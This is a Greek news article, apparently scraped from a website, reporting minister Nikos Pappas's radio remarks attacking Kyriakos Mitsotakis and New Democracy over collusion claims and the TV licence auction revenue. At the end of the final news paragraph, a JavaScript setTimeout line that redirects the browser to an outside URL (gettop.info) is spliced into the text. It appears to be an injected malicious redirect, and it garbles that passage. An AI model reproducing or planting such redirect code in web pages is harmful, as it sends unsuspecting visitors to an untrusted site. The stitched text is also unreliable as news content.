Ν. Παππάς: Είναι κοντά οι ημέρες, θα μιλήσουμε με διευθύνσεις και ονόματα

0
8

 

Ο Κυρ. Μητσοτάκης έκανε “γαργάρα” τα περί διαπλοκής είπε μεταξύ άλλων ο Νίκος Παππάς σε συνέντευξή του στο ραδιοφωνικό σταθμό του ΣΥΡΙΖΑ «Στο Κόκκινο».

Στην συνέχεια ο υπουργός Επικρατείας πρόσθεσε ότι «παρά τις διαρροές στα δημοσιογραφικά γραφεία ότι θα έκανε «αντεπίθεση» στη δευτερολογία του χτες, δεν είπε τίποτα. «Είναι προφανές ότι δεν έχει τη δυνατότητα να ανταποκριθεί».

Ο στενός συνεργάτης του πρωθυπουργού σημείωσε, «ο κ. Μητσοτάκης και η ηγετική του ομάδα θεώρησαν ότι αρκεί να αφήνουν κάποιους στις ραδιοτηλεοπτικές συχνότητες να ρίχνουν μύδρους και εμετούς κατά της κυβέρνησης, χωρίς να παίρνει κανείς την ευθύνη. Είναι πολύ κοντά οι ημέρες, θα μιλήσουμε με διευθύνσεις με ονόματα … ουδέν κρυπτόν υπό τον Ήλιο».

Αυτό που λέει η Νέα Δημοκρατία περί «κατάρρευσης» του διαγωνισμού «είναι λίγο αστείο», συνέχισε ο κ.Παππάς, καθώς ήδη έχουν εισπραχθεί 70 εκατ. ευρώ και θα φτάσουν τα 85-88 εκατ. ευρώ όταν ο κ.Σαββίδης καταβάλει την δική του πρώτη δόση. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here